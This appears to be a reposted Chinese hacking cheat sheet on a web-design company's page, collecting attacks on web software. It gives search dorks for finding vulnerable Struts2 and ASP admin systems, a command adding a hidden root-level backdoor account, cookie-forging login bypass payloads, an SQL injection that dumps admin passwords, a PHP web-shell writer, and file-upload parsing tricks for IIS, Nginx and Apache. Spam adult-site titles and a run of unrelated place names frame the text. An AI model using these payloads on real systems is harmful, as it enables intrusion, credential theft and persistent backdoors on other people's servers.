成人午夜视频全免费观看高清-秋霞福利视频一区二区三区-国产精品久久久久电影小说-亚洲不卡区三一区三区一区

各種web程序漏洞


成都創(chuàng)新互聯(lián)公司公司2013年成立,先為靜海等服務(wù)建站,靜海等地企業(yè),進行企業(yè)商務(wù)咨詢服務(wù)。為靜海企業(yè)網(wǎng)站制作PC+手機+微官網(wǎng)三網(wǎng)同步一站式服務(wù)解決您的所有建站問題。

收集整理的各種web漏洞

struts2:

Inurl:index.action

Inurl:商城.action

Inurl:index.action 標題:apache struts2

Inurl:action?id=

site:.com inurl:index.action

inurl:dhis-web-commons

利用工具操作,賬號密碼添加:

useradd -u 0 -o -g root -G root -d /home/bingdao bingdao -p $1$jWIKT776$A8S37J9KR3Z4dpbJVX3rW0

賬號:bingdao 

密碼:1

生成加密密碼詳情:

以下為生成加密密碼命令(第一個1就是密碼):

echo "1" | openssl passwd -1 -salt $(< /dev/urandom tr -dc '[:alnum:]' | head -c 32) -stdin

生成的加密密碼:$1$Rfst5gRR$dqbE2NR0npnFMyeLchbk0/

然后添加權(quán)限為root的賬號和上面的密碼:

useradd -u 0 -o -g root -G root -d /home/lengyu lengyu -p'$1$Rfst5gRR$dqbE2NR0npnFMyeLchbk0/' 

就得到了賬號為“l(fā)engyu”,密碼為“1”的用戶,然后再ssh上去

------------------------------------------------------

szwyadmin cookies欺騙:

inurl:szwyadmin/login.asp

inurl:szwyadmin

代碼:

javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));javascript:alert(document.cookie="adminpass="+escape("'or'='or'"));javascript:alert(document.cookie="admindj="+escape("1"));

代碼復(fù)制然后回車。。~ 方便快捷。。然后關(guān)閉網(wǎng)頁重新打開后臺地址,然后在地址欄中將login.asp改為admin_index.asp 就直接進入后臺了,這種方法成功率百分之80以上。


另外這套程序還有一個爆密碼的oday。

使用方法很簡單。直接填寫域名然后點擊爆密碼。~~~  直接射出管理員帳號密碼。成功率不是很理想畢竟是很多的漏洞了.

-------------------------------------------------------------------------------------------------------------------------

南方數(shù)據(jù):

inurl:HrDemand.asp

/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='

admin/southidceditor/admin_style.asp

--------------------------------------------

爆庫:

inurl:conn.asp

----------------

iis6 解析漏洞:

目錄解析  /xx.asp/xx.jpg

說明:在網(wǎng)站下建立文件夾的名字為 .asp 或 .asa 的文件夾,其目錄內(nèi)的任何擴展名的文件都被IIS當作asp文件來解析并執(zhí)行。

文件解析  1.asp;.jpg 

說明:會被服務(wù)器看成是1.asp還有IIS6.0 默認的可執(zhí)行文件除了asp還包含這三種

/1.asa

/1.cer

/1.cdx

-----------------------------------

iis7.0/iis7.5/ nginx<8.03 畸形解析漏洞:

Nginx解析漏洞這個偉大的漏洞是我國安全組織80sec發(fā)現(xiàn)的…

在默認Fast-CGI開啟狀況下,黑闊上傳一個名字為1.jpg,內(nèi)容為

  <?php fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>

的文件,然后訪問1.jpg/.php,在這個目錄下就會生成一句話*** shell.php

------------------------------------------------------------------

Nginx <8.03 空字節(jié)代碼執(zhí)行漏洞:

影響版:0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37

Nginx在圖片中嵌入PHP代碼然后通過訪問

xxx.jpg%00.php

來執(zhí)行其中的代碼

----------------
Apache 解析漏洞

        Apache 是從右到左開始判斷解析,如果為不可識別解析,就再往左判斷.

比如 wooyun.php.owf.rar “.owf”和”.rar” 這兩種后綴是apache不可識別解析,apache就會把wooyun.php.owf.rar解析成php.

        如何判斷是不是合法的后綴就是這個漏洞的利用關(guān)鍵,測試時可以嘗試上傳一個wooyun.php.rara.jpg.png…(把你知道的常見后綴都寫上…)去測試是否是合法后綴

---------------------------------------------------

在windows環(huán)境下,xx.jpg[空格] 或xx.jpg. 這兩類文件都是不允許存在的,若這樣命名,windows會默認除去空格或點,***可以通過抓包,在文件名后加一個空格或者點繞過黑名單.若上傳成功,空格和點都會被windows自動消除,這樣也可以getshell。

如果在Apache中.htaccess可被執(zhí)行.且可被上傳.那可以嘗試在.htaccess中寫入: 

<FilesMatch "1.jpg"> SetHandler application/x-httpd-php </FilesMatch>

然后再上傳shell.jpg的***, 這樣shell.jpg就可解析為php文件

分享標題:各種web程序漏洞
文章來源:http://jinyejixie.com/article28/pochjp.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供網(wǎng)站收錄網(wǎng)頁設(shè)計公司網(wǎng)站排名、面包屑導(dǎo)航品牌網(wǎng)站設(shè)計、云服務(wù)器

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)

成都做網(wǎng)站
牟定县| 绥阳县| 简阳市| 尼勒克县| 平阴县| 柯坪县| 上虞市| 永新县| 揭西县| 盐源县| 荔浦县| 广东省| 商都县| 潮州市| 新建县| 长海县| 泸西县| 剑阁县| 石城县| 稷山县| 大化| 合水县| 濮阳县| 马公市| 丰镇市| 赤壁市| 富川| 哈尔滨市| 北辰区| 郁南县| 宝兴县| 西藏| 怀远县| 梁山县| 金溪县| 宜良县| 锡林郭勒盟| 潜江市| 徐州市| 东丽区| 龙州县|